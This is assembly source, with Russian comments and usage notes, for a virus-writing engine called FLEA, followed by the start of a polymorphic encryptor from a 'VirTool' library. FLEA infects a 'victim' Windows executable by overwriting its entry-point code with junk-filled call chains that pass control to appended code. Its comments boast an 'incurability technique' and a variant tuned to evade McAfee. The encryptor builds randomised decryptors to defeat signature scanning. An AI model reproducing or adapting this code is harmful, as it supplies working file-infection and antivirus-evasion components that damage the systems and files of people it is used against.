; аналогично, как и с предыдущим полем структуры. Только тогда генератор мусора ;
; должен быть приведен к виду, как xTG (в ненужных полях можно передавать нули и все ;
; тип-топ). ;
;--------------------------------------------------------------------------------------------------------;
;[ mapped_addr ] : ;
; в этом поле хранится база мэппинга файла. Как пример, значение получаемое после ;
; вызова функи MapViewOfFile. ;
;--------------------------------------------------------------------------------------------------------;
;[ xsection ] : ;
; здесь передавать либо 0, либо IMAGE_SECTION_HEADER (в жертве) той секции, в ;
; которую после отработки должен будет передать управление данный uep-движок. ;
; Если здесь 0, то управление будет передано в конец последней секции. ;
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
; ;
; ЗАМЕТКИ ;
; ;
; ;
;1) для сокрытия точки входа (то есть для генерации пятен) следует вызвать (главную) функцию FLEA. ;
;2) для восстановления ранее сохраненных байт следует вызвать FLEA_RESTBYTES (возможно потребуется ;
; нужному участку памяти задать атрибуты страниц на чтение+запись). ;
;3) так как пятна представляют собой подфункции (с прологом, эпилогом, командой ret), и переход к ;
; следующему пятну осуществляется с помощью CALL'ов, то в стэке лежат разные значения. И чтобы после ;
; стэк сбалансировать, следует вызвать FLEA_RESTSTACK. ВАЖНО: перед вызовом функции FLEA_RESTSTACK, ;
; в стэке не должно быть уже никаких других данных. ;
; ;
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
; ;
; y0p! ;
; ;
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
; ;
; ФИЧИ ;
; ;
; ;
;(+) генерация рандомного числа пятен ;
; ;
;(+) пятна имеют рандомный размер, а также разный переход по пятнам (сверху вниз и наоборот) ;
; ;
;(+) техника неизлечимости ;
; ;
;(+) использование ГСЧ и Генератора Мусора (особенно своих, так это вообще охуительно) ;
; ;
;(+) базонезависимость ;
; ;
;(+) пятна выглядят как подфункции (с прологом, эпилогом, командой ret, а также возможно и fake winapi) ;
; ;
;(+) нет привязки к другим движкам (ГСЧ & trashgen можно юзать любой - условия читай выше;) ;
; * можно компилить как самостоятельный модуль; ;
; ;
;(+) не юзает WinAPI ;
; ;
;(+) управление можно передавать на любую секцию после отработки uep-движка (также опционально) ;
; ;
;(x) использует данные и дельта-смещение. ;
; ;
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
; ;
; y0p! ;
; ;
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
; ;
; ИСПОЛЬЗОВАНИЕ: ;
; ;
; ;
;1) Подключение: ;
; FLEA.asm ;
;2) Вызов (пример stdcall): ;
; ... ;
; szBuf db 100 dup (00h) ;
; ... ;
; lea ecx,szBuf ;
; assume ecx:ptr UEPGEN ;
; mov [ecx].rgen_addr,00401000h ;по этому адресу должен находиться ГСЧ ;
; mov [ecx].tgen_addr,00401300h ;по этому адресу должен находиться трэшген ;
; mov [ecx].mapped_addr,00330000h ;по этому адресу находится база мэппинга ;
; mov [ecx].xsection,0 ;ставим в ноль, значит уеп после передаст управление ;
; ;на конец последней секции ;
; ;остальные параметры обнулены. ;
; call FLEA ;вызываем полиморфный движок ;
; ;
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
;v1.0
;коменты обычно пишутся ночью, поэтому возможен бредняк в них.
;m1x
;pr0mix@mail.ru
;EOF
;========================================================================================================
;структуры
;========================================================================================================
UEPGEN struct
rgen_addr dd ?
tgen_addr dd ?
mapped_addr dd ?
xsection dd ?
reserved1 dd ?
UEPGEN ends
;--------------------------------------------------------------------------------------------------------
T2GEN struct ;
rgen_addr dd ? ;адрес Генератора Случайных Чисел (ГСЧ) ;
buf_for_trash dd ? ;адрес (буфер), куда записывать генерируемое (хех, качественное) дерьмо ;
size_trash dd ? ;размер (в байтах), сколько мусора записать ;
regs dd ? ;занятые регистры (2 шт) ;
xmask1 dd ? ;64-битная маска для генерации ;
xmask2 dd ? ;мусорных команд (ака фильтр) ;
beg_addr dd ? ;начальный адрес ;
end_addr dd ? ;конечный адрес ;
mapped_addr dd ? ;база мэпинга ;
reserv1 dd ? ;зарезервировано (хз, может когда-то там что и будет) ;
T2GEN ends ;
;========================================================================================================
MAX_SPOTS equ 10 ;максимальное кол-во генерируемых пятен
uportion1 equ 85 ;размер (в байтах) 1-ой порции мусора
uportion2 equ 50 ;размер (в байтах) 2-ой порции мусора
MIN_FIRST_PORTION equ uportion1-30 ;генерировать первую порцию мусора не меньше данного кол-ва байт
min_jmp equ uportion1+uportion2+7+10+30 ;расстояние минимальное
max_jmp equ min_jmp+200 ;расстояние максимальное
;далее идут значения для трэшгена
begin_address equ 0 ;начальный адрес (описание смотри в xTG.asm, либо ставь нули)
end_address equ 0 ;конечный адрес
mask_trash1 equ 00000000000011111111110101111001b ;маска для мусора
mask_trash2 equ 011110000b ;2-ая часть маски (разрешаем только генерацию фэйковых апишек)
FLEA: ;движок FLEA
pushad ;сохраняем регистры
cld
mov ebp,esp ;[ebp+00]
mov ebx,dword ptr [ebp+24h]
assume ebx:ptr UEPGEN ;ebx - указатель на структуру UEPGEN
mov esi,[ebx].mapped_addr
assume esi:ptr IMAGE_DOS_HEADER
add esi,[esi].e_lfanew
push esi ;[ebp-04] ;сохраняем указатель на IMAGE_NT_HEADERS
lodsd
assume esi:ptr IMAGE_FILE_HEADER
movzx ecx,[esi].NumberOfSections
movzx edx,[esi].SizeOfOptionalHeader
add esi,sizeof IMAGE_FILE_HEADER
assume esi:ptr IMAGE_OPTIONAL_HEADER
push [esi].AddressOfEntryPoint ;[ebp-08] ;сохраняем точку входа
push [esi].ImageBase ;[ebp-12] ;сохраняем базу
add esi,edx
assume esi:ptr IMAGE_SECTION_HEADER
sub esp,(sizeof T2GEN + 4 + 80) ;выделяем в стэке место для временных переменных и структуры T2GEN (aka TRASHGEN)
mov tgen_struct,esp
mov edx,esp
assume edx:ptr T2GEN
;--------------------------------------------------------------------------------------------------------
push mask_trash1 ;пофильтруем маску для генерации трэша
call gen_mask
or al,1
mov xtmask1,eax
push mask_trash2
call gen_mask
or eax,01110000b
mov xtmask2,eax
;--------------------------------------------------------------------------------------------------------
push [ebx].rgen_addr ;вначале заполним некоторые поля структуры TRASHGEN
pop [edx].rgen_addr
mov [edx].regs,0FFh
push xtmask1
pop [edx].xmask1
push xtmask2
pop [edx].xmask2
mov [edx].beg_addr,begin_address
mov [edx].end_addr,end_address
push [ebx].mapped_addr
pop [edx].mapped_addr
xor eax,eax
cdq
;--------------------------------------------------------------------------------------------------------
_search_new_ep_: ;далее начинаем поиск кодовой секции
cmp edx,[esi].VirtualAddress
ja _search_code_sec_
cmp eax,[esi].PointerToRawData
ja _search_code_sec_
mov edx,[esi].VirtualAddress ;а также сохраним новую точку входа (она будет указывать на конец последней секции)
mov eax,[esi].PointerToRawData
mov edi,[esi].SizeOfRawData
mov new_ep,edx
add new_ep,edi
;--------------------------------------------------------------------------------------------------------
_search_code_sec_:
push eax
mov eax,old_ep
mov edi,[esi].VirtualAddress
cmp edi,eax;old_ep
ja _nextsection_
cmp [esi].Misc.VirtualSize,0
jne _vsok_
add edi,[esi].SizeOfRawData
jmp _psok_
_vsok_:
add edi,[esi].Misc.VirtualSize
_psok_:
cmp edi,eax
jbe _nextsection_
sub eax,[esi].VirtualAddress
add eax,[esi].PointerToRawData
add eax,[ebx].mapped_addr
mov start_addr,eax ;если нашли кодовую секцию, то сохраним физический адрес точки входа, т.к. отсюда и начнем клепать пятна
mov codesec,esi ;а также сохраним аказатель в табличке секций на кодовую секцию
_nextsection_:
pop eax
add esi,sizeof IMAGE_SECTION_HEADER
loop _search_new_ep_
;--------------------------------------------------------------------------------------------------------
mov esi,codesec ;после вычислим конец кодовой секции
mov eax,[esi].SizeOfRawData
cmp eax,[esi].Misc.VirtualSize
jbe _sizecsok_
cmp [esi].Misc.VirtualSize,0
je _sizecsok_
mov eax,[esi].Misc.VirtualSize
_sizecsok_:
add eax,[esi].VirtualAddress
sub eax,old_ep
mov size_codesec,eax
add eax,old_ep
mov max_codesec_addr,eax
mov edi,imNTh
assume edi:ptr IMAGE_NT_HEADERS
;--------------------------------------------------------------------------------------------------------
_maxvacs_: ;далее, найдем максимальный адрес, и получится отрезок:
;[физич. адрес точки входа ; максимальный адрес в кодовой секции]
;и в этом отрезке будем записывать пятна. Иначе в кодовой секции могут быть директории импорта, tls и т.д.
;И если мы перепишем их своими пятнами, то будет пыцдэт файлу
mov eax,[edi].OptionalHeader.DataDirectory[ecx*8].VirtualAddress
cmp old_ep,eax
ja _nextdatadir_
cmp max_codesec_addr,eax
jb _nextdatadir_
mov max_codesec_addr,eax
_nextdatadir_:
inc ecx
cmp ecx,15
jne _maxvacs_
;--------------------------------------------------------------------------------------------------------
mov eax,max_codesec_addr
sub eax,[esi].VirtualAddress
add eax,[esi].PointerToRawData
add eax,[ebx].mapped_addr
mov max_codesec_addr,eax ;получаем максимальный физический адрес в кодовой секции
;Так, теперь диапазон у нас есть
mov eax,start_addr
mov cur_codesec_addr,eax
push MAX_SPOTS
call [ebx].rgen_addr ;рэндомно получаем, сколько пятен сгенерим и запишем в кодовую секцию
inc eax
mov num_spots,eax
call _delta_uep_
_delta_uep_:
pop eax
sub eax,_delta_uep_
lea ecx,[restore_bytes+eax]
mov beg_rest_bytes,ecx ;в этот буфер будем сохранять оригинальные байты из кодовой секции (которые перепишем пятнами)
xor ecx,ecx
;--------------------------------------------------------------------------------------------------------
_nextaddrforspots_:
call get_jmpaddr ;получим адрес очередного пятна, на которое прыгнем
add eax,cur_codesec_addr
push eax
add eax,(uportion1+uportion2+7+10) ;прибавим 2 порции мусора + max размер (mov reg,<address> call reg) (7 byte) + размер пролога и эпилога для каждого пятнышка (6 byte + 3 byte) + размер команды ret (+1 byte)
cmp eax,max_codesec_addr ;и сравним с максимальный допустимым адресом
pop eax
jae _alladdrforspots_ ;если больше макс. адреса, то пятна больше не варик генерить, и выходим из цикла
push eax ;иначе сохраняем в стэке адрес
mov cur_codesec_addr,eax ;сделаем текущим адресом проверки адрес для нового пятна
inc ecx
cmp ecx,num_spots
jne _nextaddrforspots_
_alladdrforspots_:
mov num_spots,ecx ;сохраним кол-во пятен, которые точно можно записать в кодовой секции
;--------------------------------------------------------------------------------------------------------
cmp cl,1
push 0
pop eax
jb _enduep_ ;если ноль пятен, то выходим из движка
mov eax,esp
push start_addr ;будем перемешивать все полученные адреса пятен, кроме первого
je _nomixaddr_
;--------------------------------------------------------------------------------------------------------
push ecx
push eax
call mix_addr ;перемешаем адреса пятен
_nomixaddr_:
xor edx,edx
mov edi,beg_rest_bytes
stosb ;в 1-ом байте будет храниться кол-во пятен. Пока пропустим его
mov cur_rest_bytes,edi
;--------------------------------------------------------------------------------------------------------
_genspot_:
mov edi,cur_rest_bytes
_portion1_:
push uportion1
call [ebx].rgen_addr
cmp eax,MIN_FIRST_PORTION
jb _portion1_
mov spot1,eax
xchg eax,ecx
push uportion2
call [ebx].rgen_addr
mov spot2,eax
add ecx,eax
add ecx,(7+10) ;max_size (mov reg,<address> call reg) (7 byte) + prologue (6 byte) + epilogue (3 byte) + ret (1 byte)
mov eax,ecx
stosd ;сначала сохраним в спец. буфере размер очередного пятна (это 1-ая порция мусора + jmp + 2-ая порция мусора)
mov eax,dword ptr [esp]
mov esi,codesec
sub eax,[ebx].mapped_addr
sub eax,[esi].PointerToRawData
add eax,[esi].VirtualAddress
add eax,base
stosd ;и сохраним следом абослютный виртуальный адрес, куда после будем восстанавливать ранее сохраненные байты
mov esi,dword ptr [esp]
rep movsb ;а после сохраним байты, на место которых запишем пятно
mov cur_rest_bytes,edi
pop edi
push edx
mov edx,tgen_struct
;--------------------------------------------------------------------------------------------------------
mov [edx].buf_for_trash,edi
mov [edx].size_trash,6 ;размер пролога
mov [edx].xmask1,0b
mov [edx].xmask2,100b ;в маске разрешаем генерацию только пролога (для другого генератора мусора здесь возможна генерация порции мусора)
push edx
call [ebx].tgen_addr ;запишем пролог (push ebp mov ebp,esp sub esp,0xXX)
push xtmask1
pop [edx].xmask1
push xtmask2
pop [edx].xmask2
;--------------------------------------------------------------------------------------------------------
mov [edx].buf_for_trash,eax
mov eax,spot1
mov [edx].size_trash,eax
push edx
call [ebx].tgen_addr ;запишем первую порцию мусора
xchg eax,edi
push edi
add edi,5
mov eax,dword ptr [esp+04]
cmp eax,num_spots ;проверим, остался последний адрес для записи пятна?
jne _nextspot_ ;если да, тогда запишем финальное пятно, jmp в котором будет указывать на последнюю секцию, а не на очередное пятно
;********************************************************************************************************
comment %
;запись финального пятна
mov esi,codesec ;с помощью нехитрой формулы посчитаем операнд для jmp (0xE9)
sub edi,[ebx].mapped_addr
sub edi,[esi].PointerToRawData
add edi,[esi].VirtualAddress
mov ecx,[ebx].xsection
jecxz _notxsec_
assume ecx:ptr IMAGE_SECTION_HEADER
sub edi,[ecx].VirtualAddress
sub edi,[ecx].SizeOfRawData ;здесь строим call near (0xE8 0xXX 0xXX 0xXX 0xXX)
jmp _finalcall_
_notxsec_:
sub edi,new_ep
_finalcall_:
neg edi
xchg edi,dword ptr [esp]
mov al,0E8h ;0E9h ;CALL NEAR 0xXXXXXXXX (0xE8 0xXX 0xXX 0xXX 0xXX)
stosb
pop eax
stosd
;%
;comment ! ;for mcafe
mov edi,new_ep
mov ecx,[ebx].xsection
jecxz _notxsec_ ;если поле пустое, значит управление после уепа передаем в конец последней секции
assume ecx:ptr IMAGE_SECTION_HEADER
mov edi,[ecx].VirtualAddress
add edi,[ecx].SizeOfRawData
_notxsec_:
add edi,base ;а здесь строим
xchg edi,dword ptr [esp]
mov al,0B8h ;mov reg32,<address>
stosb
pop eax
stosd
mov al,0FFh ;call reg32
stosb
mov al,0D0h
stosb
;!
mov [edx].buf_for_trash,edi
mov eax,spot2
mov [edx].size_trash,eax
push edx
call [ebx].tgen_addr ;2-ая порция мусора для финального пятна
;--------------------------------------------------------------------------------------------------------
mov [edx].buf_for_trash,eax
mov [edx].size_trash,3 ;размер эпилога
mov [edx].xmask1,0b
mov [edx].xmask2,1000b ;в маске разрешаем генерацию только эпилога (для другого генератора мусора здесь возможна генерация очередной порции мусора)
push edx
call [ebx].tgen_addr ;запишем эпилог для финального пятна (mov esp,ebp pop ebp)
mov byte ptr [eax],0C3h ;и запишем ret
;--------------------------------------------------------------------------------------------------------
pop edx
jmp _endspot_ ;выходим из цикла
;********************************************************************************************************
;запись очередного пятна
_nextspot_:
sub edi,dword ptr [esp+08] ;следующий адрес
neg edi
xchg edi,dword ptr [esp]
mov al,0E8h ;CALL NEAR (0xE8 0xXX 0xXX 0xXX 0xXX)
stosb
pop eax
stosd
mov [edx].buf_for_trash,edi
mov eax,spot2
mov [edx].size_trash,eax
push edx
call [ebx].tgen_addr ;2 порция мусора для очередного пятнышка
;--------------------------------------------------------------------------------------------------------
mov [edx].buf_for_trash,eax
mov [edx].size_trash,3 ;размер эпилога
mov [edx].xmask1,0b
mov [edx].xmask2,1000b ;в маске разрешаем генерацию только эпилога (для другого генератора мусора здесь возможна генерация очередной порции мусора)
push edx
call [ebx].tgen_addr ;запишем эпилог для очередного пятна (mov ebp,esp pop ebp)
mov byte ptr [eax],0C3h ;и запишем ret
;--------------------------------------------------------------------------------------------------------
pop edx
inc edx
jmp _genspot_
;--------------------------------------------------------------------------------------------------------
_endspot_:
mov edi,beg_rest_bytes
mov eax,num_spots ;корректируем кол-во записанных пятен (т.к. до этого мы не посчитали 1-ого пятна, которое всегда записывается в точке входа)
inc eax
stosb
mov eax,start_addr
mov esi,codesec
sub eax,[ebx].mapped_addr
sub eax,[esi].PointerToRawData
add eax,[esi].VirtualAddress
add eax,base
;--------------------------------------------------------------------------------------------------------
_enduep_:
mov esp,ebp
mov dword ptr [ebp+1Ch],eax ;результат в EAX
popad
ret 4
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
;конец дфункции/движка FLEA
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
;функция FLEA_RESTBYTES
;восстановление ранее сохраненных байт (на свои места)
;ВЫХОД:
; - делает свое дело :)
;EAX - кол-во сгенерированных пятен (на места которых восстановим ранее сохраненные байты)
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
FLEA_RESTBYTES:
pushad
cld
call _delta_ueprest_
_delta_ueprest_:
pop eax
sub eax,_delta_ueprest_
lea esi,[restore_bytes+eax]
push esi
xor eax,eax
lodsb
xchg eax,ebx ;сохраняем в EBX кол-во записанных пятен
mov edx,ebx
_nextrestspot_:
lodsd
xchg eax,ecx ;сохраняем в ECX размер очередного пятна
lodsd
xchg eax,edi ;сохраняем в EDI адрес, где находится очередное пятно
rep movsb ;и запишем на место этого пятна оригинальные (ранее сохраненные) байты
dec ebx
jne _nextrestspot_
pop eax
sub esi,eax
xchg eax,esi
mov dword ptr [esp+1Ch],edx
popad
ret
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
;конец функции FLEA_REST
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
;функция FLEA_RESTSTACK
;сбаланирование стэка после после пятен
;ВХОД (stdcall) (FLEA_RESTSTACK(DWORD num_spots)):
;num_spots - количество отработанных в жертве пятен
; (это значение можно получить из буфера restore_bytes)
;ВЫХОД:
;балансировка стэка, а также в ECX=0, EAX = адрес команды, которая выполняется сразу после вызова данной
;функции (FLEA_RESTSTACK);
;ЗАМЕТКИ:
; так как каждое пятно меняло регистр EBP и ESP (клало EBP в стэк, а также адрес, следующий за
; CALL'ом), то надо восстановить данные регистры, и соответственно стэк.
; ВАЖНО: вызывать эту функцию только тогда, когда в стэке вы уже не храните никакие данные.
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
FLEA_RESTSTACK:
pop eax
pop ecx
_reststack_:
add esp,4 ;pop edx
mov esp,ebp
pop ebp
loop _reststack_
jmp eax
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
;конец функи FLEA_RESTSTACK
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
;вспомогательная функция gen_mask
;генерация маски для мусора
;ВХОД (stdcall) (gen_mask(DWORD xmask)):
; xmask - начальная маска
;ВЫХОД:
; EAX - новая маска
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
gen_mask:
push ecx
mov ecx,dword ptr [esp+08]
push -1
call [ebx].rgen_addr
and ecx,eax
rol eax,10h
push eax
call [ebx].rgen_addr
and ecx,eax
xchg eax,ecx
pop ecx
ret 4
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
;конец функции gen_mask
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
;вспомогательная функция get_jmpaddr
;получение операнда для jmp'a, который будет прыгать на следующее пятно
;ВЫХОД:
;ЕАХ - искомое значение
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
get_jmpaddr:
push max_jmp
call [ebx].rgen_addr
cmp eax,min_jmp
jb get_jmpaddr
ret
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
;конец функции get_jmpaddr
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
;вспомогательная функция mix_addr
;перемешивание случайным образом данных в массиве
;заметки: в данном движке используется для перемешивания случаным образом адресов пятен
;ВХОД ( mix_adr(DWORD *addr_mas, DWORD num_elem) ):
;addr_mas - адрес буфера(массива), где находятся значения, которые следует перемешать
;num_elem - кол-во этих самых элементов
;ВЫХОД:
;перемешанные адреса в буфере(массиве)
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
mix_addr:
pushad ;
mov ecx,dword ptr [esp+28h] ;ECX - кол-во элементов
mov esi,dword ptr [esp+24h] ;ESI - адрес буфера, где находятся эти элементы
xor edx,edx
_nxtmix_:
push ecx
call [ebx].rgen_addr ;получаем СЧ [0..ECX-1]
push dword ptr [esi+edx*4] ;и перемешиваем
push dword ptr [esi+eax*4]
pop dword ptr [esi+edx*4]
pop dword ptr [esi+eax*4]
inc edx
cmp edx,ecx
jne _nxtmix_ ;если перемешали все элементы, то на выход
popad
ret 4*2
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
;конец функции mix_addr
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
;========================================================================================================
;вспомогательные переменные (находятся в стэке)
;========================================================================================================
imNTh equ dword ptr [ebp-04] ;указатель на IMAGE_NT_HEADERS
old_ep equ dword ptr [ebp-08] ;старая точка входа
base equ dword ptr [ebp-12] ;ImageBase
new_ep equ dword ptr [ebp-16] ;новая точка входа (в конец последней секции)
start_addr equ dword ptr [ebp-20] ;физический адрес точки входа (+ база мэппинга)
codesec equ dword ptr [ebp-24] ;указатель на кодовую секцию в табличке секций
size_codesec equ dword ptr [ebp-28] ;размер в кодовой секции, который реально можно использовать для записи пятен
max_codesec_addr equ dword ptr [ebp-32] ;максимальный допустимый адрес в кодовой секции, до которого можно записывать пятна
cur_codesec_addr equ dword ptr [ebp-36] ;текущий адрес в кодовой секции (используется для получения очередного адреса нового пятнышка)
num_spots equ dword ptr [ebp-40] ;кол-во реально записанных пятен в кодовую секцию
beg_rest_bytes equ dword ptr [ebp-44] ;адрес буфера, где хранится кол-во записанных пятен, размеры их, адреса, а также оригинальные байты кодовой секции
cur_rest_bytes equ dword ptr [ebp-48] ;текущий адрес в буфере (вспомогтальная переменная), куда сохраняем оригинальные байты кодовой секции etc
spot1 equ dword ptr [ebp-52] ;размер 1-ой порции мусора (этих первых порций мусора столько, сколько пятен будем записывать) (также вспомогательная переменная)
spot2 equ dword ptr [ebp-56] ;размер 2-ой порции мусора etc
tgen_struct equ dword ptr [ebp-60] ;адрес структуры TRASHGEN (для трэшгена xTG - или другого тэшгена)
xtmask1 equ dword ptr [ebp-64] ;новая маска1
xtmask2 equ dword ptr [ebp-68] ;новая маска2
restore_bytes db MAX_SPOTS*(uportion1+uportion2+7+10)+MAX_SPOTS*(4+4)+101 dup (00h);буфер, представляющий собой следующую структуру:
;num_spots db 1 ;кол-во записанных пятен в кодовой секции
;size_spot1 dd 1 ;размер очередного пятна
;addr_spot1 dd 1 ;адрес очередного пятнышка
;save_bytes1 db size_spot1 ;сохраненные оригинальные байты (вместо которых мы и записали очередное пятно)
;size_spot2 dd 1 ;etc
;addr_spot2 dd 1
;save_bytes2 db size_spot2
;...
;size_spot(num_spots) dd 1
;addr_spot(num_spots) dd 1
;save_bytes(num_spots) db size_spot(num_spots)
UEP_RESTBYTES_SIZE equ $ - restore_bytes ;размер буфера, что выше
;========================================================================================================

BIN
libs/VirTool.Win32.Cryptor.Mixer.7z Normal file
View File

Binary file not shown.

334
libs/VirTool.Win32.Cryptor.Pgs.asm Normal file
View File

@ -0,0 +1,334 @@
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
; [POLYMORPHIC GENERATOR OF SHIT V. 0.4] ;
; ;
; ######### ######## ######## ;
; ########### ########## ########## ;
; ##### ###### ###### ## ###### ## ;
; ##### ##### ##### ##### ;
; ##### ##### ##### ######## ;
; ########### ##### ###### ######## ;
; ######### ##### ###### ##### ;
; ##### ##### ### ##### ;
; ##### ########### ########### ;
; ##### ##### ### ######### ;
; ;
; FOR MS WINDOWS ;
; ;
; BY SL0N ;
;------------------------------------------------------------------------------;
; MANUAL: ;
; BUFFER FOR ENCRYPTED CODE + DECRYPTORS -> EDI ;
; START OF CODE -> EAX ;
; SIZE OF CODE -> ECX ;
; ;
; CALL MORPH ;
; ;
; SIZE OF ENCRYPTED CODE + DECRYPTORS -> ECX ;
; BUFFER WITH ENCRYPTED CODE + DECRYPTORS -> EDI ;
;------------------------------------------------------------------------------;
; (+) DO NOT USE WIN API ;
; (+) EASY TO USE ;
; (+) GENERATE GARBAGE INSTRUCTIONS (1,2,3,4,5,6 BYTES) ;
; (+) USE DELTA OFFSET ;
; (+) USE X87 INSTRUCTIONS ;
; (+) IT CREATES VARIABLE DECRYPTOR SIZE ;
; (+) RANDOMLY CHANGE REGISTERS IN INSTRUCTIONS ;
; (+) RANDOM 32 BIT ENCRYPTION ALGORITHM (ADD/SUB/XOR) ;
; (+) RANDOM NUMBER OF DECRYPTORS ;
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
morph:
push esi ebp ; Ñîõðàíÿåì ðåãèñòðû
call delta0 ;
delta0: ; Âû÷èñëÿåì
pop ebp ; äåëüòà ñìåùåíèå
sub ebp,offset delta0 ;
push eax ; Êëàä¸ì â ñòýê eax
decr_number:
mov eax,40 ; Ãåíåðèðóåì ñëó÷àéíîå ÷èñëî
call brandom32 ; â äèàïàçîíå 0..30
test eax,eax ; Åñëè ÷èñëî ðàâíî 0, òî îíî
jz decr_number ; íàì íå ïîäõîäèò
mov ebx,eax ; Ïîìåùàåì ÷èñëî â ebx
pop eax ; Âîññòàíàâëèâàåì eax
multi_decr:
mov edx,edi
call polym ;
mov eax,edx ;
add edi,ecx ; Ãåíåðèðóåì ñòîëüêî
dec ebx ; äåêðèïòîðîâ, ñêîëüêî
test ebx,ebx ; çàïèñàíî â ðåãèñòðå ebx
jnz multi_decr ;
sub edi,ecx ; ðåçóëüòàòàìè
pop ebp esi ; Âîññòàíàâëèâàåì ðåãèñòðû
ret ; Âîçâðàò èç ïîäïðîãðàììû
;------------------------------------------------------------------------------;
polym:
